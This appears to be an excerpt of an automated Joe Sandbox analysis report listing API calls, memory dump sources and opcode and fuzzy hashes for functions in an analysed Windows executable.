                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: b066e694d5f2e983e0a9ae18ea48b87120eb6d7b1acc62b2f185fbaf1f1be7b7
                                                                                                                                        • Instruction ID: 1579760b52871c95b2d2f95bb73df9c0439162ed408ad783800e636fa7e64b9a
                                                                                                                                        • Opcode Fuzzy Hash: b066e694d5f2e983e0a9ae18ea48b87120eb6d7b1acc62b2f185fbaf1f1be7b7
                                                                                                                                        • Instruction Fuzzy Hash: 9841C271940658DADF20EB60EC59BEE73B8AF51300F0400EAE48A93092DF786FC8DB51
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: da98dd705b0d4f42b1c039357bc27ad6e05b47f849b043f00816f34949fd9f1b
                                                                                                                                        • Instruction ID: 6e90381b8b3618d2965fb2669d37289fd96c148a3668c1eca291aae5dd2c56dd
                                                                                                                                        • Opcode Fuzzy Hash: da98dd705b0d4f42b1c039357bc27ad6e05b47f849b043f00816f34949fd9f1b
                                                                                                                                        • Instruction Fuzzy Hash: 9C2128B1E40215AFDB14DFB8CC4576B7668FB56314F00073AE505EB682D7789D01C6E8
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007A948A
                                                                                                                                          • Part of subcall function 0079137E: __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 0079137E: new.LIBCMT ref: 007913FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: bd6ad16a1f743c989e0803dba1f1a699f452eef3ae289f15c53c26cd7aaedba4
                                                                                                                                        • Instruction ID: fab72b8c1f1806688ba0917bf47065367e1690d03c1fb7743579cc08a77f366f
                                                                                                                                        • Opcode Fuzzy Hash: bd6ad16a1f743c989e0803dba1f1a699f452eef3ae289f15c53c26cd7aaedba4
                                                                                                                                        • Instruction Fuzzy Hash: 5A21A372C04249DACF15DF94D9515EEB7B4FF5A300F5005EAE809A3242D7396E15CF60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B5A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B5ACE
                                                                                                                                        • _free.LIBCMT ref: 007B8F50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B5ACE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00795B3A
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        APIs
                                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0079A174
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791E93
                                                                                                                                          • Part of subcall function 007918F6: __EH_prolog.LIBCMT ref: 007918FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791E93
                                                                                                                                          • Part of subcall function 007918F6: __EH_prolog.LIBCMT ref: 007918FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        APIs
                                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 0079F927
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecutionStateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2211380416-0
                                                                                                                                        APIs
                                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 007A8B6B
                                                                                                                                          • Part of subcall function 007A8924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007A8945
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1915507550-0
                                                                                                                                        • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                                                        • Instruction ID: 8cec9b5aadc7ed5b4df06cef77be34cee9307adc42e198be310d8119ed2f6523
                                                                                                                                        • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                                                        • Instruction Fuzzy Hash: 6FD05EB0600108BA9B816A608C0697E7AD8EB83350F004229BC04A5150EE76D9206662
                                                                                                                                        APIs
                                                                                                                                        • GetFileType.KERNELBASE(000000FF,0079964C), ref: 00799726
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                        • Opcode ID: dedcf94efdb3349a634848d560175ce07313441976108f18b23bf444483977c0
                                                                                                                                        • Instruction ID: d969552361370a24313d0d602f07291267bbd62ccb69fd5e0d70362cd15f249a
                                                                                                                                        • Opcode Fuzzy Hash: dedcf94efdb3349a634848d560175ce07313441976108f18b23bf444483977c0
                                                                                                                                        • Instruction Fuzzy Hash: D4D01230031200D59E610E7C7E0A0796751DB433A7B28DAECE265C40A1CF2AC843F580
                                                                                                                                        APIs
                                                                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 007ABF9C
                                                                                                                                          • Part of subcall function 007A991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A992F
                                                                                                                                          • Part of subcall function 007A991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A9940
                                                                                                                                          • Part of subcall function 007A991E: TranslateMessage.USER32(?), ref: 007A994A
                                                                                                                                          • Part of subcall function 007A991E: DispatchMessageW.USER32(?), ref: 007A9954
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchItemPeekSendTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4142818094-0
                                                                                                                                        • Opcode ID: 9e99fadcd0870961d04eae8a24334930fde36dc7415678b1d788b812d690cc52
                                                                                                                                        • Instruction ID: 5d2c116434e1c5a362a467ae5d13f3edc18bd17040dc7f3bf7fa963cfd591dd8
                                                                                                                                        • Opcode Fuzzy Hash: 9e99fadcd0870961d04eae8a24334930fde36dc7415678b1d788b812d690cc52
                                                                                                                                        • Instruction Fuzzy Hash: 8BD09E71144200FEDA116B51DD0AF0A7BA2BB98B05F008558B344340B286669D31AB06
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 95dce026e3e7b0c172a79afc3ca606f6376acd325fefed24559697aaf47f9a73
                                                                                                                                        • Instruction ID: 9464b6f82330e65ea39449fef2b1475632c971d442076b5c7f3a293dfa43f3b8
                                                                                                                                        • Opcode Fuzzy Hash: 95dce026e3e7b0c172a79afc3ca606f6376acd325fefed24559697aaf47f9a73
                                                                                                                                        • Instruction Fuzzy Hash: EBB012D2268205BD3289D1042F0AF3B030CC0C2B15330C22FF400C0240E84C0C018533
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 0d3458023d7ff1e228a1c6c616dd4d46d048a8a0d42b619df1421cfdd70c5b94
                                                                                                                                        • Instruction ID: 7c6944ba87f58ba55a83e873b815bae030c662c5d3da9a044f4475cfde8fcf00
                                                                                                                                        • Opcode Fuzzy Hash: 0d3458023d7ff1e228a1c6c616dd4d46d048a8a0d42b619df1421cfdd70c5b94
                                                                                                                                        • Instruction Fuzzy Hash: 1EB012D2278105BC3289D1041D0AF3B030CC0C2B15330C22FF800C0240E84C0C008533
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: d123f8e52ee77fa2416cb6e20ba6c251883dd32177259e01729250a6c9babaee
                                                                                                                                        • Instruction ID: 69ac0505f4b1471442a595296491062b2d3b1ae0ec13e7565fedb7eb6ec8aeb3
                                                                                                                                        • Opcode Fuzzy Hash: d123f8e52ee77fa2416cb6e20ba6c251883dd32177259e01729250a6c9babaee
                                                                                                                                        • Instruction Fuzzy Hash: 25B012D2278005BC3289D1055D0AF3B030CD0C2B15330C32FF401C0240E94C0C008133
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 37b0662932933752d71ec3fa2f036b4300e14c356c20f962697244df3f376736
                                                                                                                                        • Instruction ID: 14a90fff1ebe254c75454594a727afa4df6536609c9d2e4a68aa7a7a0a9b14bf
                                                                                                                                        • Opcode Fuzzy Hash: 37b0662932933752d71ec3fa2f036b4300e14c356c20f962697244df3f376736
                                                                                                                                        • Instruction Fuzzy Hash: 90B012E2268205BC364D91401D4EF3B031CC0C2B25330C32FF400D4140E84C1C40C533
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        APIs
                                                                                                                                        • SetEndOfFile.KERNELBASE(?,00798EDB,?,?,-00001954), ref: 00799B6D
